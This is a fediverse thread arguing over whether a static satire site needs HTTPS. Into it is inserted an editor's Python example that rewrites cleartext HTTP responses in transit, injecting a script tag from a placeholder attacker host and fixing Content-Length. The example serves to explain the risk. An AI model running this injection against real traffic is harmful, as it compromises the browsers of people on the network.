I /really/ need to add this to my RSS reader because it’s *so good*. This is the best description I’ve ever seen of the Microsoft acquisition of Github.

@wxcafe For your weekly dose of cynicism and bad faith. Definitely would recommend ^^

@wxcafe Interestingly, n-gate doesn't seem to support https.

@wxcafe Maybe if security doesn't matter to you. Especially given how easy and cost-free it is to set up these days.

@wxcafe HTML is information, and the purpose of HTTP is to exchange it.

Anyone intercepting the connection at any point can still inject stuff (like scripts), even if the original host only provides static content. And anyone can still read out the entire message and use it for personal/meta data harvesting.

Anyone understanding what the words "information", "exchange" and "security" mean would care.
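The injection described in the post above, shown as an added example by the editor rather than code from any participant in the thread: an on-path party rewrites a cleartext HTTP response carrying a purely static HTML page, splices in a script tag, and fixes up Content-Length so the browser accepts the modified body. The sample response and the `attacker.example` hostname are constructed placeholders, not captured traffic.

```python
"""Added example: on-path rewrite of a cleartext HTTP response.

Nothing here needs the origin server to be dynamic. Any hop between the
client and the server can do this to a static page served over plain
HTTP, because HTTP alone gives the client no way to check integrity.
"""

# Placeholder payload; attacker.example is a reserved example hostname.
INJECTED = b'<script src="http://attacker.example/x.js"></script>'


def split_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status line, header list, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header/body separator in response")
    lines = head.split(b"\r\n")
    status = lines[0]
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return status, headers, body


def inject_script(raw: bytes, payload: bytes = INJECTED) -> bytes:
    """Return the response with `payload` inserted before </body>.

    Non-HTML responses are passed through untouched. Content-Length is
    recomputed so the client reads the whole modified body instead of
    truncating it at the original length.
    """
    status, headers, body = split_response(raw)
    lookup = {k.lower(): v for k, v in headers}
    ctype = lookup.get(b"content-type", b"")
    if not ctype.lower().startswith(b"text/html"):
        return raw

    # bytes.lower() preserves length, so indices map back onto `body`.
    idx = body.lower().rfind(b"</body>")
    if idx == -1:
        new_body = body + payload
    else:
        new_body = body[:idx] + payload + body[idx:]

    out_headers = []
    for name, value in headers:
        if name.lower() == b"content-length":
            value = str(len(new_body)).encode()
        out_headers.append(name + b": " + value)

    return status + b"\r\n" + b"\r\n".join(out_headers) + b"\r\n\r\n" + new_body


# Constructed sample: a static page exactly like the one n-gate might serve.
BODY = b"<html><body><p>Static page, nothing dynamic here.</p></body></html>"
SAMPLE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
    b"\r\n" + BODY
)


if __name__ == "__main__":
    tampered = inject_script(SAMPLE)
    print(tampered.decode())
```

The Content-Length fix-up is the part people forget: without it a browser reads only the original number of bytes and the injected tag may never be parsed, which is why a real interceptor always rewrites the framing and not just the body.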

@wxcafe @tyil so friendly... I think he has a good point: Setting up TLS certificates is super easy these days.

After all it is the author's decision not to do it. Cannot really blame someone for that. If he doesn't know better: educate him.

If you really cared for "security" in that context you should try to get a cert fingerprint in-person from the author/admin. The certificate authority system is broken anyway...

@andi @tyil look, I know. I have TLS everywhere. I used to have self-signed certs everywhere before LE came along. I have a yubikey to store my gpg key. I do totp 2fa on ssh logins. I get crypto. But I also get that some things are not worth tls-ing, and that who the fuck gives a shit. It’s literally not a problem for anyone. It’ll be flagged as insecure by browsers soon and they’ll probably upgrade then. It’s fine, calm down, stop telling strangers on the internet.

@wxcafe @andi

Nice wall of buzzwords. Doesn't change the fact you don't grasp basic concepts of "information", "exchange" or "security", and then proceed to tell people to "piss off" when they try to explain it to you.

@andi @wxcafe "The certificate authority system is broken anyway..."

No discussion there, the CA system is horrible.

@tyil @andi @wxcafe And when we have a browser-supported encryption scheme that doesn't use the CA system, I'll happily join the "encrypt everything" bandwagon.

@ocdtrekkie @andi @wxcafe That's fair. I acknowledge the current CA system is broken, and that we should adopt a better system.

@wxcafe this is why I ultimately don't like n-gate

they're contrarian to *everything*, virtually no exceptions, and it gets old and depressing after a while. I don't want to see that much shit consistently week after week, even if some of it is funny.

@tyil @wxcafe I mean, I agree that not using TLS is just kinda lazy now, but if I had the capability to pull off the cleartext packet injection attack you're describing literally what prevents me from just rerouting your next DNS request to a fallback insecure host of my own for more pwnage?

@nickfarr @tyil look don’t try, this person clearly grasps basic concepts of “information”, “exchange” and “security” better than we do, we can’t compare

@wxcafe @tyil LOL, I'm not even considered "technical" by most of our mutual friends.

@nickfarr @wxcafe I'm not saying that applying TLS is the absolute cure-all for security vulnerabilities. We all know that's not true (I hope).

But it would prevent certain attacks for next to no cost. This faulty concept that some people have that plain-text sites are somehow secure by default is harmful to propagate, and I'd rather people not do that. Which is why I tried to explain that part.

@tyil @wxcafe And herein lies the crux: cost/benefit.

Just as there's no magic bullet for security, nor should anything be assumed as default secure, one can't be dogmatic in telling total strangers what their threat model or cost/benefit is.

I've seen lots of people introduce new security holes trying to make TLS work in their environment. LE made it soooo much easier, but in shared environments (i.e. most hosting), TLS is still non-trivial.

@nickfarr I agree with you, don't get me wrong.

I just wanted to clear up to that person that static pages aren't "secure" any more than other pages. In reality, all content transmitted over HTTP is static pages.

@jasper @wxcafe While absolutely, how likely is it that the resolver doesn't support it and the domain is unsigned? Probably pretty good.
